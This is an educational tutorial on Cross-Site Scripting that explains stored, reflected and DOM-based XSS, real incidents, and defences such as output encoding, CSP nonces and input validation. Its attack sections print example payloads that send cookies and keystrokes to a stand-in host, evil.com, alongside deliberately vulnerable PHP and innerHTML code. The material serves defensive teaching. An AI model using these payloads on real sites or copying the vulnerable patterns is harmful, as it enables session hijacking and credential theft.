Understanding Cross-Site Scripting

What Is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) is a vulnerability that allows an attacker to inject malicious JavaScript into web pages viewed by other users. When the victim's browser loads the page, it executes the injected script as if it were legitimate code from the website. The browser has no way to know the script was not intended by the site's developers.

XSS is consistently ranked among the top web application vulnerabilities. It had its own category in the OWASP Top 10 through the 2017 edition and is covered under Injection in the 2021 edition. It has been used in attacks against major organizations including social media platforms, email services, and banking applications.

💡

Why "Cross-Site"?

The name comes from the fact that the attack crosses the boundary between sites. An attacker's code runs in the context of the victim site, with access to that site's cookies, session data, and DOM. From the browser's perspective, the malicious script has the same privileges as any other script on that page.

The root cause of XSS is always the same: the application includes untrusted data in its output without proper sanitization or encoding. Any place where user input ends up in a web page is a potential XSS injection point.

Types of XSS Attacks

XSS attacks are classified into three types based on how the malicious script reaches the victim's browser. Understanding each type is essential for building effective defenses.

Stored XSS (Persistent)

In stored XSS, the attacker's malicious script is permanently saved on the target server -- typically in a database, comment field, forum post, or user profile. Every user who views the affected page receives the malicious script as part of the normal page content.

<!-- Attacker submits this as a forum comment -->
Great article! <script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>

<!-- The server stores it in the database and later renders it -->
<div class="comment">
  <p>Great article! <script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script></p>
</div>

<!-- Every visitor's browser now executes the script -->

Stored XSS is generally the most dangerous type because it does not require the attacker to trick users into clicking a link. The malicious payload is served automatically to every visitor. A single stored XSS in a popular forum post could compromise thousands of accounts.
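
The rendering step is where the stored payload becomes dangerous. The following is a minimal Python sketch of that step, not any particular forum's code: the `stored_comments` list stands in for a database table, and both `render_comment_*` helpers are hypothetical names introduced for illustration.

```python
import html

# Hypothetical stand-in for the comments table in a database.
stored_comments = [
    "Great article! <script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>",
]

def render_comment_unsafe(comment: str) -> str:
    # VULNERABLE: the stored text is concatenated into the markup unchanged.
    return '<div class="comment"><p>' + comment + "</p></div>"

def render_comment_safe(comment: str) -> str:
    # Encoded at output time, so the browser displays the markup as text.
    return '<div class="comment"><p>' + html.escape(comment) + "</p></div>"

for comment in stored_comments:
    print(render_comment_unsafe(comment))
    print(render_comment_safe(comment))
```

The stored data is identical in both cases. Only the way it is written into the page differs.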

Reflected XSS (Non-Persistent)

In reflected XSS, the malicious script is included in a request to the server (usually in a URL parameter or form field) and immediately reflected back in the response without being stored. The attacker must trick the victim into clicking a crafted link.

<!-- Vulnerable search page at example.com/search -->
<!-- Server-side code (PHP example): -->
<p>Search results for: <?php echo $_GET['q']; ?></p>

<!-- Attacker crafts this URL and sends it to the victim: -->
https://example.com/search?q=<script>document.location='https://evil.com/steal?c='+document.cookie</script>

<!-- When the victim clicks the link, the server reflects the script back -->
<p>Search results for: <script>document.location='https://evil.com/steal?c='+document.cookie</script></p>

Reflected XSS requires social engineering to deliver the malicious link to the victim, which limits its reach compared to stored XSS. However, it is extremely common because so many applications reflect user input in their responses.
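
To make the reflection step concrete, here is a small Python sketch that mimics the search page without a web server. The `search_page` function and its `encode` flag are hypothetical; the sketch only assumes that the server percent-decodes the `q` parameter before using it, as web frameworks normally do.

```python
import html
from urllib.parse import urlsplit, parse_qs

def search_page(url: str, encode: bool) -> str:
    # Extract and percent-decode the 'q' parameter, as a server would.
    params = parse_qs(urlsplit(url).query)
    q = params.get("q", [""])[0]
    if encode:
        # HTML-encode the value before reflecting it into the page.
        q = html.escape(q)
    return "<p>Search results for: " + q + "</p>"

crafted = "https://example.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E"
print(search_page(crafted, encode=False))  # payload reflected as markup
print(search_page(crafted, encode=True))   # payload reflected as text
```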

DOM-Based XSS

DOM-based XSS occurs entirely in the browser. The vulnerability is in client-side JavaScript code that reads data from an attacker-controllable source (like the URL fragment or document.referrer) and writes it into the page without sanitization. When the payload travels in the URL fragment, the server never sees it, because browsers do not send the fragment with the request, so server-side filters and logs cannot catch it.

<!-- Vulnerable JavaScript on the page -->
<script>
  // Reads everything after the '#' in the URL (the fragment)
  var name = location.hash.substring(1);
  document.getElementById('greeting').innerHTML = 'Hello, ' + name + '!';
</script>

<!-- Attacker sends this URL: -->
https://example.com/page#<img src=x onerror=alert(document.cookie)>

<!-- The JavaScript writes the payload into the DOM -->
<div id="greeting">Hello, <img src=x onerror=alert(document.cookie)>!</div>

⚠️

innerHTML is dangerous.

Using innerHTML to insert user-controlled data is one of the most common causes of DOM-based XSS. Always use textContent instead when you want to display text. textContent treats the input as plain text and will never execute HTML or scripts.

How XSS Attacks Work in Practice

A simple alert() popup proves a vulnerability exists, but real attacks go much further. Here is what an attacker can do once they can execute JavaScript in a victim's browser session.

Session Hijacking

A classic XSS attack steals session cookies that are not protected by the HttpOnly flag. Once the attacker has the victim's session cookie, they can impersonate the victim without knowing their password.

<!-- Steal session cookie and send it to attacker's server -->
<script>
  new Image().src = 'https://evil.com/log?cookie=' + encodeURIComponent(document.cookie);
</script>

Keylogging

Injected scripts can capture every keystroke the user types on the page, including passwords, credit card numbers, and private messages.

<script>
  document.addEventListener('keypress', function(e) {
    fetch('https://evil.com/keys', {
      method: 'POST',
      body: JSON.stringify({ key: e.key, timestamp: Date.now() })
    });
  });
</script>

Phishing and Page Manipulation

An attacker can modify the entire page content, replacing the login form with one that sends credentials to the attacker's server. Because the URL still shows the legitimate domain, the victim has no visual indication that something is wrong.

Real-World Impact

XSS vulnerabilities have been exploited in major incidents that affected millions of users. Understanding the real-world scale helps justify the investment in prevention.

Samy Worm (2005) -- A stored XSS worm on MySpace that added the attacker as a friend and propagated the payload to each victim's profile. It infected over one million accounts in under 24 hours, making it the fastest-spreading worm at the time.
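British Airways (2018) -- Attackers injected malicious JavaScript into the payment page via a supply chain compromise. This was a script-skimming attack rather than classic XSS, but the effect was the same: attacker code ran inside the legitimate page. Approximately 380,000 payment card details were stolen. BA was fined 20 million pounds by the UK ICO in 2020.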
eBay (2015-2016) -- Persistent XSS vulnerabilities in eBay listings allowed attackers to inject scripts into product pages, redirecting buyers to phishing sites.
TweetDeck (2014) -- A stored XSS worm spread through Twitter's TweetDeck application, automatically retweeting itself and affecting over 80,000 users before Twitter shut down TweetDeck temporarily.

⚠️

XSS can lead to full account takeover.

If a site is vulnerable to XSS and does not use the HttpOnly cookie flag, an attacker can steal session cookies and take complete control of user accounts. Even with HttpOnly cookies, XSS allows attackers to perform actions as the victim using their active session.
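
As a rough illustration of the HttpOnly flag, the sketch below builds a `Set-Cookie` header with Python's standard `http.cookies` module. The cookie name `session` and the helper `session_cookie_header` are assumptions made for the example, and the `Secure` flag is an extra that the text above does not require.

```python
from http.cookies import SimpleCookie

def session_cookie_header(session_id: str) -> str:
    cookie = SimpleCookie()
    cookie["session"] = session_id
    # HttpOnly hides the cookie from document.cookie, so injected
    # scripts cannot read it directly.
    cookie["session"]["httponly"] = True
    # Secure (an addition in this sketch) restricts the cookie to HTTPS.
    cookie["session"]["secure"] = True
    cookie["session"]["path"] = "/"
    return cookie.output(header="Set-Cookie:")

print(session_cookie_header("abc123"))
```

This narrows what a successful injection can steal. It does not stop the injected script from acting on the victim's behalf.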

Prevention: Output Encoding

The most effective defense against XSS is output encoding (also called output escaping). The idea is simple: before inserting any untrusted data into HTML, convert special characters into their HTML entity equivalents so the browser treats them as text, not code.

HTML Entity Encoding

<!-- These characters must be encoded when inserting into HTML: -->
&  becomes  &amp;
<  becomes  &lt;
>  becomes  &gt;
"  becomes  &quot;
'  becomes  &#x27;

<!-- Example: user input is "<script>alert(1)</script>" -->

<!-- Without encoding (VULNERABLE): -->
<p><script>alert(1)</script></p>

<!-- With encoding (SAFE): -->
<p>&lt;script&gt;alert(1)&lt;/script&gt;</p>
<!-- Browser displays: <script>alert(1)</script> as text -->
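
In Python, the standard library's `html.escape` performs this conversion. The short sketch below applies it to the example input and to each of the five characters listed above; the wrapper name `encode_html` is hypothetical.

```python
import html

def encode_html(value: str) -> str:
    # quote=True also encodes " and ', which matters inside attributes.
    return html.escape(value, quote=True)

user_input = "<script>alert(1)</script>"
print(encode_html(user_input))

# Each special character from the list above, encoded on its own.
for ch in ["&", "<", ">", '"', "'"]:
    print(repr(ch), "becomes", encode_html(ch))
```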

Context-Aware Encoding

The correct encoding depends on where the data is being inserted. HTML encoding is not sufficient for all contexts.

HTML body -- Use HTML entity encoding. Convert < > & " ' to their entity forms.
HTML attributes -- Use attribute encoding. Always quote attribute values and encode the quote character used.
JavaScript strings -- Use JavaScript encoding. Escape special characters with their Unicode escape sequences (\uXXXX).
URLs -- Use URL encoding (encodeURIComponent()) for parameter values, which percent-encodes special characters. When untrusted data supplies the whole URL, also restrict the scheme to http or https, because percent-encoding does not neutralize javascript: URLs.
CSS -- Avoid inserting user data into CSS if possible. If unavoidable, use CSS hex encoding.
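
The differences between contexts are easier to see side by side. The following Python sketch shows one possible encoder per context using only the standard library. The `for_*` function names are hypothetical, and the sketch is meant to illustrate the idea, not to replace the encoders that ship with a template engine or security library.

```python
import html
import json
from urllib.parse import quote

def for_html_body(value: str) -> str:
    # Encodes & < > so the value is displayed as text.
    return html.escape(value, quote=False)

def for_html_attribute(value: str) -> str:
    # Also encodes both quote characters; the attribute must still be quoted.
    return html.escape(value, quote=True)

def for_js_string(value: str) -> str:
    # json.dumps produces a quoted, escaped string literal. The extra
    # replacements keep sequences like </script> out of the output.
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026")
                   .replace("'", "\\u0027"))

def for_url_component(value: str) -> str:
    # Percent-encodes everything except unreserved characters.
    return quote(value, safe="")

payload = "</script><script>alert(1)</script>"
print(for_html_body(payload))
print(for_html_attribute('" onmouseover="alert(1)'))
print(for_js_string(payload))
print(for_url_component("a b&c=d"))
```

The same input needs a different transformation in each place, which is why a single "sanitize" function applied everywhere tends to leave gaps.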

Framework Auto-Encoding

Modern web frameworks provide automatic output encoding by default. This is the single biggest improvement in XSS prevention over the past decade.

<!-- React: JSX automatically encodes expressions -->
<p>{userInput}</p>  <!-- Safe: React encodes userInput -->

<!-- Vue.js: double curly braces auto-encode -->
<p>{{ userInput }}</p>  <!-- Safe: Vue encodes userInput -->

<!-- Django templates: auto-encode by default -->
<p>{{ user_input }}</p>  <!-- Safe: Django encodes user_input -->

<!-- DANGEROUS: bypassing auto-encoding -->
<div dangerouslySetInnerHTML={{__html: userInput}} />  <!-- React: UNSAFE -->
<p v-html="userInput"></p>                             <!-- Vue: UNSAFE -->
{{ user_input|safe }}                                     <!-- Django: UNSAFE -->

💡

Never bypass auto-encoding without a security review.

Methods like dangerouslySetInnerHTML (React), v-html (Vue), and the |safe filter (Django/Jinja) exist for rare cases where you genuinely need to render trusted HTML. If the data comes from user input, do not use these. If you must render user-provided HTML, use a dedicated HTML sanitizer library like DOMPurify.

Prevention: Content Security Policy

Content Security Policy (CSP) is a powerful HTTP header that acts as a second line of defense against XSS. Even if an attacker finds a way to inject a script tag, CSP can prevent it from executing.

# Strong CSP that blocks most XSS attacks
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self';

This policy tells the browser to execute only scripts loaded from your own origin. Inline scripts and inline event handlers, the most common XSS payloads, are blocked because the policy does not include 'unsafe-inline'. Even if an attacker injects <script>alert(1)</script>, the browser will refuse to run it.
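
A policy like the one above is often assembled in code so that each directive can be reviewed separately. The Python sketch below shows one way to do that. `build_csp` is a hypothetical helper, and how the resulting header is attached to a response depends on the framework in use.

```python
def build_csp(directives: dict[str, list[str]]) -> str:
    # Join each directive name with its sources, then join the directives.
    return "; ".join(
        f"{name} {' '.join(sources)}" for name, sources in directives.items()
    )

policy = build_csp({
    "default-src": ["'self'"],
    "script-src": ["'self'"],
    "object-src": ["'none'"],
    "base-uri": ["'self'"],
})

# The header a server would send with every HTML response.
headers = {"Content-Security-Policy": policy}
print(headers)
```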

Using Nonces for Inline Scripts

If your application needs inline scripts, use a CSP nonce. The server generates a fresh, unpredictable random token for every response and includes it in both the CSP header and the legitimate script tags. Only scripts with the matching nonce will execute, so the nonce must never be reused or derived from anything an attacker can guess.

<!-- Server generates a unique nonce per request -->
Content-Security-Policy: script-src 'nonce-a1b2c3d4e5f6'

<!-- Legitimate script with matching nonce: RUNS -->
<script nonce="a1b2c3d4e5f6">
  console.log('This runs because it has the correct nonce');
</script>

<!-- Injected script without nonce: BLOCKED -->
<script>alert('This is blocked by CSP')</script>
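
Generating the nonce is a small task on the server. The Python sketch below shows one way to do it with the standard `secrets` module. The helper names `new_nonce`, `csp_header`, and `script_tag` are hypothetical, and the 16-byte length is an assumption, not a requirement stated above.

```python
import secrets

def new_nonce() -> str:
    # 16 bytes from the OS CSPRNG, rendered as URL-safe base64 text.
    return secrets.token_urlsafe(16)

def csp_header(nonce: str) -> str:
    return f"script-src 'nonce-{nonce}'"

def script_tag(nonce: str, body: str) -> str:
    return f'<script nonce="{nonce}">{body}</script>'

# One nonce per response, used in both the header and the markup.
nonce = new_nonce()
print("Content-Security-Policy:", csp_header(nonce))
print(script_tag(nonce, "console.log('allowed');"))
```

An injected script cannot predict the value for the next response, so it has no way to carry a matching nonce attribute.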

Prevention: Input Validation

Input validation is the third layer of defense. While it should never be your only protection, validating input reduces the attack surface by rejecting obviously malicious data before it enters your system.

Validation Principles

Allowlisting over blocklisting -- Define what is allowed, not what is forbidden. Blocklists always miss edge cases. If a field should contain a phone number, validate that it only contains digits, spaces, hyphens, and plus signs.
Validate on the server -- Client-side validation improves UX but provides zero security. An attacker can bypass it trivially by sending requests directly to the server.
Validate type and format -- Numeric fields should only accept numbers. Email fields should match email format. Dates should parse as valid dates.
Limit length -- Set reasonable maximum lengths for all input fields. A username does not need to accept 10,000 characters.

# Server-side validation example (Python/Flask)
from flask import Flask, render_template, request
from markupsafe import escape

app = Flask(__name__)

@app.route('/search')
def search():
    query = request.args.get('q', '')

    # Validation: limit length
    if len(query) > 200:
        return 'Search query too long', 400

    # Validation: strip control characters
    query = ''.join(c for c in query if c.isprintable())

    # Output encoding: escape for HTML context.
    # escape() returns a Markup object, so Jinja's autoescaping
    # will not encode it a second time.
    safe_query = escape(query)

    return render_template('results.html', query=safe_query)
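
The allowlisting principle can be sketched in a few lines. The example below validates the phone number field described in the list above. The pattern, the 20-character limit, and the name `is_valid_phone` are assumptions chosen for illustration.

```python
import re

# Allowlist: digits, spaces, hyphens, and plus signs, 1 to 20 characters.
PHONE_PATTERN = re.compile(r"[0-9 +\-]{1,20}")

def is_valid_phone(value: str) -> bool:
    # fullmatch requires the whole value to fit the allowlist.
    return PHONE_PATTERN.fullmatch(value) is not None

print(is_valid_phone("+1 555-0100"))
print(is_valid_phone("<script>alert(1)</script>"))
```

Because the check defines what is allowed, new payload tricks are rejected without the pattern ever needing to know about them.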

⚠️

Input validation alone does NOT prevent XSS.

There are countless encoding tricks, Unicode bypasses, and context-specific payloads that can evade input filters. Validation is a useful additional layer, but output encoding must always be your primary defense. OWASP's guidance can be summarized as: encode on output, validate on input, and use CSP as a safety net.

Testing for XSS

Whether you are a developer testing your own application or learning about web security, knowing how to identify XSS vulnerabilities is a critical skill.

Manual Testing Approach

Identify injection points: Find every place where user input appears in the page output -- search bars, form fields, URL parameters, error messages, profile fields, comment sections, and HTTP headers.

Submit test payloads: Start with a simple, harmless payload like <b>test</b>. If the text appears bold on the page, the application is not encoding HTML and is likely vulnerable to XSS.

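Check the rendering context: View the page source (Ctrl+U) to see exactly how the server rendered your input. For input written into the page by client-side JavaScript, inspect the live DOM in the developer tools' Elements panel instead, because the page source shows only the server's response. Is your input inside an HTML tag, an attribute, a JavaScript string, or a CSS value? The context determines which payloads will work.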

Test context-specific payloads: If your input lands inside an HTML attribute, try breaking out of it with a quote character. If it lands in JavaScript, try closing the string and injecting code.
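
The first check in this process, whether a harmless payload comes back encoded or not, can be partly automated. The Python sketch below classifies a response body that has already been fetched. `classify_reflection` is a hypothetical helper, and it recognizes only the entity forms produced by `html.escape`, so a "not reflected" result still deserves a manual look.

```python
import html

def classify_reflection(response_body: str, payload: str) -> str:
    if payload in response_body:
        # The markup came back unchanged: likely vulnerable.
        return "reflected unencoded"
    if html.escape(payload) in response_body:
        # The application HTML-encoded the payload.
        return "reflected HTML-encoded"
    return "not reflected"

payload = "<b>test</b>"
print(classify_reflection("<p>Results for: <b>test</b></p>", payload))
print(classify_reflection("<p>Results for: &lt;b&gt;test&lt;/b&gt;</p>", payload))
print(classify_reflection("<p>No results</p>", payload))
```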

Automated Tools

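Burp Suite -- Web security testing toolkit built around an intercepting proxy. The automated scanner, which includes XSS checks, is part of the Professional edition. The free Community Edition provides the proxy and Repeater tools and is sufficient for learning manual testing.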
ZAP (formerly OWASP ZAP) -- Free, open-source security scanner. Its active scanner automatically tests for reflected and stored XSS.
Browser Developer Tools -- Use the Console tab to check for CSP violations and the Network tab to inspect how inputs are reflected in responses.

💡

Practice Legally

Only test for XSS on applications you own or have explicit written permission to test. Use intentionally vulnerable practice labs like OWASP WebGoat, DVWA (Damn Vulnerable Web Application), or PortSwigger Web Security Academy to develop your skills safely and legally.

Summary

Cross-Site Scripting remains one of the most prevalent and impactful web vulnerabilities. Here is what you learned:

XSS allows attackers to inject malicious JavaScript that runs in victims' browsers with the same privileges as the legitimate site
Stored XSS persists on the server and attacks every visitor; Reflected XSS requires a crafted link; DOM-based XSS occurs entirely in client-side code
XSS enables session hijacking, keylogging, phishing, and full account takeover
Output encoding is the primary defense -- always encode untrusted data for the correct context (HTML, attribute, JavaScript, URL)
Content Security Policy acts as a safety net by restricting which scripts the browser will execute
Input validation is a useful additional layer but must never be relied upon alone
Modern frameworks provide automatic encoding -- never bypass it without a security review

🎉

Solid foundation!

You now understand how XSS works and how to defend against it. Next, learn about SQL Injection -- another critical injection vulnerability that targets the database layer instead of the browser.